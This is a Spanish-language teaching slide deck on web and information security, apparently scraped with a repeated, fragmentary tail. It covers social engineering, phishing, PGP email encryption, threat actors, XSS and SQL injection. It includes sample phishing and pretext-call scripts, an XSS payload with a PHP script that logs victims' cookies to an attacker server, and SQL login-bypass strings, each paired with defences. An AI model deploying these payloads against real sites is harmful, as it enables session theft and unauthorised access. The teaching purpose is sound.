Seguridad Web

Seguridad de la información
p Protección de la información y de los

sistemas de información contra
n Acceso indebido
n Uso, negligente o no
n Divulgación
n Interrupción
n Destrucción no autorizada
p Conceptos básicos
n Confidencialidad
p La información solo debe ser legible para personal autorizado
p Evita que exista una intercepción de esta y que pueda ser leída por
una persona no autorizada
n Disponibilidad
p Garantiza el acceso
n Irrefutabilidad
p No se puede negar la autoría
n Autenticación
p Solo individuos autorizados tienen acceso a los recursos
n Integridad
p Garantizar que los datos sean los que se suponen que son
y no se hayan alterados in situ o durante una transmisión
Existe la seguridad absoluta???

p Todo es vulnerable si se aplica
aplica la fuerza justa
p Laúnica razón por la cual utilizamos

rejas en nuestras casas es porque
hace que el ataque sea más lento
p El coste de la seguridad aumenta

exponencialmente a la necesidad de
minimizar el riesgo
p Un hacker puede gastar una ínfima parte en

intentar vulnerar un sistema de lo que cuesta
evitar el ataque
p Las empresas asumen riesgos

a fin de minimizar costes
p Objetivo:
p Obtener un factor coste/riesgo asumible
p Una máxima:
p El sistema de seguridad no puede ser más valioso
que el sistema o los datos que protege
p Existen documentos, directrices y

recomendaciones para establecer políticas de
seguridad adecuadas
INGENIERÍA SOCIAL
p La mayor parte de los ataques exitosos son total
o parcialmente debidos a Ingeniería Social
p Kevin Mitnick “Condor” es considerado el primer

hacker que la usó. (Doc: Freedom downtown)
n “El factor determinante es interpretar correctamente
las políticas de seguridad y hacerlas cumplir”
n Los ataques de ingeniería social (teléfono o email), son
basados en cuatro principios básicos y comunes a las
personas:
p Todos queremos ayudar
p Somos confiados
p No nos gusta decir No
p A todos nos gusta que nos alaben
p Ingeniería social
n Consiste en la manipulación de las

personas para que voluntariamente
realicen actos que normalmente no harían
n Se convierte en el método de ataque más

sencillo, menos peligroso para el atacante
y por desgracia en uno de los más
efectivos
n Aprovecha el desconocimiento de unas

mínimas medidas de seguridad
p Ingeniería social
Ah, también
gestiono una red. Nunca pude
¿Cómo configura pensar en
sus firewalls? una buena
contraseña.
¿Qué utiliza
usted?
p Ingeniería social - Phishing
Phisher se Phisher utiliza la
prepara para información para
atacar suplantar a víctima
Phisher envía mail

fraudulento a
victimas
Información
Víctima sigue confidencial es
indicaciones de enviada al Phisher
phisher
Víctima compromete
información
confidencial
p Ejemplos Ingeniería social
n correo electrónico:
From: Super-User <root@sistema.com>

To: Usuario <user@sistema.com>
Subject: Cambio de clave
Hola, Para realizar una serie de pruebas orientadas a
conseguir un optimo funcionamiento de nuestro
sistema, es necesario que cambie su clave mediante la
orden 'passwd'. Hasta que reciba un nuevo aviso
(aproximadamente en una semana), por favor, asigne a
su contraseña el valor 'PEPITO' (en mayúsculas).
Rogamos disculpe las molestias.
Saludos, Administrador
n Llamada telefónica (el atacante sabe el nombre de cuenta):
Administrador: Buenos días, aquí área de sistemas, en qué podemos
ayudarle?
Atacante: Hola, soy José Luis Pérez, llamaba porque no consigo

recordar mi password en la máquina sistema.xx.es.
Administrador: Un momento, me puede decir su nombre de usuario?
Atacante: Sí, claro, es jlperez.

Administrador: Muy bien, la nueva contraseña que acabo de
asignarle es *****. Por favor, nada más conectar, no olvide
cambiarla.
Atacante: Por supuesto. Muchas gracias, ha sido muy amable.
Administrador: De nada, un saludo.

n http://www.youtube.com/watch?v=Ao20tAS3x3I
n http://www.youtube.com/watch?v=wiRuBZxMLss&feature=re
lated (3 videos)
n http://www.youtube.com/watch?v=NgHYI4AUUPc
n http://www.youtube.com/watch?v=cm89EQCF5e8&feature=re
lated
PHISHING
p Como funciona
1. Correo electrónico masivo
2. Correo electrónico phishing
3. Sitio Web fraudulento
p Afecta principalmente
n instituciones financieras
n proveedores internet
n grandes tiendas
p Correo
n Remitente:
Banco Bilbao Vizcaya Argentaria

info@bbva.es
n Asunto:
Aviso Importante
n Logotipo oficial
n Aviso de Phishing
n Derechos reservados
n Teléfono de contacto
Reconocerías una
web falsa?
p Correo donde el INE hace un sondeo sobre
satisfacción con los bancos
1. Damos la información
2. Nos redirige a la web oficial
p 40% error incluso entre usuarios
“tecnológicamente avanzados”
www.bankofthevvest.com
www.hatmail.com
http://www.faccebook.es/
p http://www.phishtank.com/
n Facebook: http://faccebook.c.la/
n PayPal: http://www.phishtank.com/phish_detail.php?phish_id=916961
n Bank of America: http://www.phishtank.com/phish_detail.php?phish_id=916955
n Hotmail: http://www.phishtank.com/phish_detail.php?phish_id=916948
p Otros tipos de phishing
n Vía programa malicioso.

p Troyano que instala programa espía (en juegos y aplicaciones free)
n A través de ataque al navegador con vulnerabilidades

p Permitegenerar interfaces superpuestas sobre webs oficiales
p Muy difícil de detectar
n Scam: ofertas de trabajo para blanquear dinero
n Nuevas variantes:
p Vishing:con tecnología VoIp (Identificador de llamada falsificable)
p Smishing: usan SMS
p Spear phishing: el correo va al jefe (CEO)
§ Correo personalizado
§ No usan correo masivo
p Tendencias
n A la profesionalización
p Ataques sofisticados y difíciles de detectar
p Difícil identificar interfaces falsas
p Simulación de URL
p Ataques sobre DNS
n Siguen funcionando los ataque simples e ingeniería

social de nivel bajo
n Cada vez más las pequeñas empresas afectadas

p Prevención
n Su usuario, contraseña, pin, firma, etc. son datos de

carácter personal y estrictamente confidenciales
n Desconfíe de cualquier toma de datos personales realizada

a través de Internet fuera de su sitio web seguro.
n No dé nunca información personal o financiera en respuesta

a un e-mail
n No utilice los enlaces incorporados en e-mails o páginas

Web de terceros
n Cuidado con los adjuntos (exe, doc, xls…)
n Educación y mucha cultura de seguridad

COMO PROTEGERNOS
p ¿Cómo nos protegemos de la forma
más eficiente posible?
1. Determinando que queremos proteger

(ej: Hardware, datos, comunicaciones, sistemas, etc.)
2. Estableciendo prioridades de los
factores a proteger
3. Creando políticas de seguridad
4. Manteniendo la seguridad en el tiempo
p Debemos enfocarnos en
n reducir el riesgo, no en tratar de
eliminar las amenazas, ya que es
imposible.
p Para eso debemos saber

n de qué o quiénes nos protegemos
n cómo nos atacan.
p Pocos ataques tienen éxito sin una preparación
previa: Infiltrado de programas, recopilación de
información sobre usuarios, claves, etc.
p Un sistema de seguridad es tan fuerte como su

eslabón más débil
p Para poder defender nuestros sistemas, es necesario

conocer la forma en que los atacantes actúan y
cuáles son sus armas
“El único sistema que está seguro es el que se encuentra

debidamente apagado y dentro de una caja ignifuga”
(Gene Spafford)
Ataques
organizativos
Hackers
Ataques
Datos restringidos automatizados
DoS
Infracciones
accidentales Errores de conexión
de la seguridad
Denegación de
Virus, servicio (DoS)
caballos de Troya
y gusanos
p Estrategias de seguridad
n Proactivas (proteger y proceder)

p Se basan en la prevención de ataques
p Reducir al mínimo la cantidad de puntos
vulnerables
p Desarrollar planes de contingencia
n Reactivas (perseguir y procesar)

p Posterior al ataque
p Evaluar ataque, reparar e implementar plan de
contingencia, documentar y aprender
Con respecto a la postura en recursos compartidos
n Lo que no se permite está expresamente

prohibido
p El sistema está perfectamente delimitado
n Lo que no se prohíbe está permitido

p Menos restrictiva y favorecida por la imposibilidad de
políticas de restricción a medida para todos los
posibles casos
Datos Encriptación
Seguridad de programas y
Aplicación servicios
Fortalecer el sistema operativo,
Host autenticación
Marketing, Ventas, Finanzas,
Red interna encriptar datos de red
Oficina principal, oficina sucursal,
Perímetro socio de negocios. Firewall
Seguridad física Protecciones, seguros,
dispositivos de seguimiento
Políticas, procedimientos y Documentos de seguridad,
conciencia educación del usuario
p Debemos formar al usuario:
Cultura de seguridad
Formatos potencialmente peligrosos
No abrir archivos no solicitados
No utilizar fuentes no confiables
Navegación segura
Política de passwords
Copias de seguridad
FIRMA Y CIFRADO
DE CORREO
p Cifrar: Alterar el contenido para que sólo los destinatarios puedan
entenderlo
p Firmar: permite al destinatario comprobar que el mensaje no fue

modificado en el camino y que lo que lee es exactamente lo que se
envió
p Como lo hacemos
p Clave pública:
§ La conocen sólo los destinatarios
§ Permite a la gente verificar nuestra firma y crear mensajes cifrados para nosotros.
§ Para enviar correos cifrados
p Clave privada:
§ Sólo la conoce el emisor
§ Permite firmar y descifrar correo
§ Para enviar correos firmados
p no se puede averiguar una a través de la otra.

p Ejemplo de firma
p Ejemplo de cifrado
p Cifrado con PGP (GNU Privacy Guard)
n Aplicación de cifrado asimétrico libre
n http://www.gnupg.org/
n ftp://ftp.gnupg.org/gcrypt/binary/ (windows)
n http://macgpg.sourceforge.net/(mac)
p Instalamos PGP
p Necesitamos un cliente de correo

n Thunderbird
n http://es-es.www.mozillamessaging.com/es-
ES/thunderbird/
p Necesitamos un software de cifrado y autenticación

n Enigmail 1.0.1
n https://addons.mozilla.org/es-ES/thunderbird/addon/71
n Instalamos: ThunderbirdàHerramientasàComplementos
n Genera nueva opción de menú OpenPGP
p Generar las claves
n OpenPGP à Administración de claves
n En el administrador de claves
p Generar à Nuevo par de claves

p Generar certificado de revocación
p Configuración de las claves

n En la configuración de la cuenta : activar soporte
OpenPGP
p Subir claves públicas a

n http://www.rediris.es/cert/servicios/keyserver/
p Encriptar con GMAIL
n Configurarel navegador “Conexión del navegador” para
usar siempre https
n Instalamos PGP
n Usaremos Mozilla Firefox
n Instalamos el complemento para Firefox

p FireGPG
p http://es.getfiregpg.org/s/install
p Incompatible con FireFTP
p Reiniciar si es necesario
n Acceder a Gmail y firmar y cifrar a través de iconos

AMENAZAS EN LA RED
p Existen 4 tipos de amenazas en la red:
n Interrupción: Hace que el objetivo del ataque se

pierda, quede inutilizable o no disponible
n Interceptación: Consiste en acceder a un

determinado objeto del sistema
n Modificación: Además de la interceptación, el

objeto del ataque es modificado
n Fabricación: Modificación destinada a suplantar el

objeto real
p Ataques Internos
n Premeditación
n Descuido
n Ignorancia
n Indiferencia de las políticas de seguridad
p Ataques externos
n Hackers, Crackers, Lammers, Script-Kiddies
n Motivaciones:
p Ranking, reto personal
p Robo de datos
p Pruebas (pen test), etc.
p Origen de las amenazas
n Personas: Piratas que buscan nivel de privilegios en un

sistema. Además de conocimientos técnicos, usan
tácticas como la Ingeniería Social y el Basureo.
n Personal de la organización: Cualquier empleado

puede ser una amenaza. Pueden causar daños no
intencionados, pero cuando lo hacen de forma
intencionada son extremadamente dañinos
n Ex-empleados: Pueden tener motivos para Atacar
n Curiosos: Aunque se trata de ataques no destructivos,

el borrado de huellas puede causar daños
p Hackers (expertos)
n De sombrero blanco
p Ayudan a mejorar los sistemas y tecnologías
informáticas
p Responsables de los protocolos informáticos
y herramientas
p Optimizan sistemas, prueban las tecnologías
y aprenden con el objetivo de hacerlas mas
eficientes y fiables
n De sombrero negro (piratas)
p Propósito siempre malicioso
p De sombrero negro (piratas)
nScript Kiddies (crashers, lamers, packet monkeys)

p Jóvenes usuarios que usan programas
encontrados en la red par dañar sistemas
p Sin conocimientos y altamente incompetentes
p Lamer. Se utiliza con tono despectivo para describir a
un hacker que no sigue las reglas de la comunidad, o
que intenta pavonearse de sus hazañas y
conocimientos.
n Phreakers
p Usan la red telefónica para hacer llamadas gratis
p De sombrero negro (piratas)
n Caders: atacan sistemas de tarjetas (generalmente
bancarias) para entender su funcionamiento y
aprovechar sus vulnerabilidades
n Crackers: crean software para atacar sistemas

informáticos o eliminar la protección anticopia del
software con licencia
n Hacktivistas: Hackers con motivaciones ideologías

EN LA WEB
p Servidores y platatormas web
n Ataques internos
p Suplantación de identidad
p Sniffing (Incluso administradores pueden hacer sniffing.
Sugerencia: CIFRAR)
p Robo de información. (Ej: para la competencia)
p Virus, Troyanos, Gusanos
p Espionaje: Trashing, Shoulder Surfing, Spyware, etc
p Keylogging - Keycatching
p KeyCatcher
p Trashing (basureo)
n Alfombrilla ratónà
n Ataques externos
p Ataques contra servicios WEB
§ Cross Site Scripting (XSS)
§ SQL Injection
§ Exploits: aprovecha una vulnerabilidad de SO, Sw y Hw
p Robo de Identidad
p Denegación de Servicio (DoS)
p SPAM
p VIRUS
p Phishing: ingeniería social, url mal escritas, webs
simuladas
p Troyanos: software malicioso bajo una apariencia
inofensiva
CROSS SITE SCRIPTING

XSS
n Cross Site Scripting (XSS)

p Aprovecha la falta de mecanismos de filtrado en los
campos de entrada
p Permiten insertar y enviar datos sin validación alguna,
aceptando el envió de scripts completos
p Pueden generar secuencias de comandos maliciosas que
impacten directamente en el sitio o en el equipo de un
usuario
p Sentencias ocultas en el código: en enlaces, formularios…
p Se usa el correo electrónico para enviarlos
p Se usan blogs, foros, libros de visitas…
p Ejemplos Cross Site Scripting (XSS)
Supongamos que un sitio web tiene la siguiente forma:

http://www.example.com/home.asp?frame=menu.asp
En este ejemplo, ¿qué pasaría si se pone como URL del

frame un código javascript?
javascript:while(1)alert("Este mensaje saldrá

indefinidamente");
p Ejemplos Cross Site Scripting (XSS)
Un atacante aprovecha la vulnerabilidad de nuestro sitio y publica una imagen

de la siguiente manera:
http://www.mipagina.com/mifoto.jpg name="foto“
onload="foto.src='http://www.mipagina.com/foto.php?
galleta='%20+document.cookie;">
Código de foto.php.
<? $migalleta = $_REQUEST[galleta];
$file=fopen("cookies.txt", "a");
fput($file, "$migalleta\n");
fclose($file); ?>
La variable que contiene las cookies galleta del usuario será almacenada
en un documento de texto llamado cookies.txt alojado en el servidor del
atacante
p Defensa Cross Site Scripting (XSS)
n Url
p Evitar llamadas a servidores externos
p Evitar parámetros susceptibles (sql, datos privados…)
n En formularios:
p Limitar la longitud de los campos de entrada MaxLength
p Validar los campos (expresiones regulares)
n Cookies
p Evitar almacenar datos susceptibles
§ Nombre usuario y contraseña
§ Tarjetas, cuentas bancarias …
p Encriptar todas las cookies de nuestro sitio
n Usar SSL (Secure Socket Layer)
p No es 100% seguro contra XSS pero ayuda
SQL INJECTION
p SQL Injection
n Filtrado incorrecto de las variables utilizadas en las

partes del programa con código SQL.
<% usuario=request.form("usuario")
pass=request.form("pass")
sql="SELECT * FROM usuarios WHERE user='" & usuario & "'
and password='" & pass & "'“ %>
p El usuario teclea en el formulario
usuario:" a' or true ‘"
contraseña: " a' or true ‘“
La cadena
n resultado sería
SELECT * FROM users WHERE user='a' or true and pass='a' or true
Otron ejemplo
SELECT * FROM users WHERE user = ‘root' AND password='' OR ''='
p SQL Injection
n Mas peligroso
p Se pueden concatenar sentencias de modificación,
insertado y borrado de datos o de tablas
n Solución:
p No usar usuario root para acceso a las BBDD
p Validar el contenido y longitud de los campos
p Usar procedimientos almacenados
p Evitar es que, al formar la cadena SQL, ésta tenga un
"sentido" distinto al esperado = Eliminar comillas
$query_result = mysql_query("SELECT * FROM usuarios

WHERE nombre = \"" .
mysql_real_escape_string($nombre_usuario) . "\"");

Seguridad Web

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Seguridad Web

Uploaded by

Copyright:

Available Formats

Seguridad de la información

p Protección de la información y de los

Existe la seguridad absoluta???

p Laúnica razón por la cual utilizamos

p El coste de la seguridad aumenta

p Un hacker puede gastar una ínfima parte en

p Las empresas asumen riesgos

p Existen documentos, directrices y

p Kevin Mitnick “Condor” es considerado el primer

n Consiste en la manipulación de las

n Se convierte en el método de ataque más

n Aprovecha el desconocimiento de unas

Phisher envía mail

From: Super-User <root@sistema.com>

Atacante: Hola, soy José Luis Pérez, llamaba porque no consigo

Administrador: Un momento, me puede decir su nombre de usuario?

Atacante: Sí, claro, es jlperez.

Atacante: Por supuesto. Muchas gracias, ha sido muy amable.

Administrador: De nada, un saludo.

Banco Bilbao Vizcaya Argentaria

n Vía programa malicioso.

n A través de ataque al navegador con vulnerabilidades

n Scam: ofertas de trabajo para blanquear dinero

n Siguen funcionando los ataque simples e ingeniería

n Cada vez más las pequeñas empresas afectadas

n Su usuario, contraseña, pin, firma, etc. son datos de

n Desconfíe de cualquier toma de datos personales realizada

n No dé nunca información personal o financiera en respuesta

n No utilice los enlaces incorporados en e-mails o páginas

n Cuidado con los adjuntos (exe, doc, xls…)

n Educación y mucha cultura de seguridad

1. Determinando que queremos proteger

p Para eso debemos saber

p Un sistema de seguridad es tan fuerte como su

p Para poder defender nuestros sistemas, es necesario

“El único sistema que está seguro es el que se encuentra

n Proactivas (proteger y proceder)

n Reactivas (perseguir y procesar)

Con respecto a la postura en recursos compartidos

n Lo que no se permite está expresamente

n Lo que no se prohíbe está permitido

Formatos potencialmente peligrosos

No abrir archivos no solicitados

No utilizar fuentes no confiables

p Firmar: permite al destinatario comprobar que el mensaje no fue

p no se puede averiguar una a través de la otra.

p Necesitamos un cliente de correo

p Necesitamos un software de cifrado y autenticación

p Generar à Nuevo par de claves

p Configuración de las claves

p Subir claves públicas a

n Usaremos Mozilla Firefox

n Instalamos el complemento para Firefox

n Acceder a Gmail y firmar y cifrar a través de iconos

n Interrupción: Hace que el objetivo del ataque se

n Interceptación: Consiste en acceder a un

n Modificación: Además de la interceptación, el

n Fabricación: Modificación destinada a suplantar el

n Personas: Piratas que buscan nivel de privilegios en un

n Personal de la organización: Cualquier empleado

n Ex-empleados: Pueden tener motivos para Atacar

n Curiosos: Aunque se trata de ataques no destructivos,

nScript Kiddies (crashers, lamers, packet monkeys)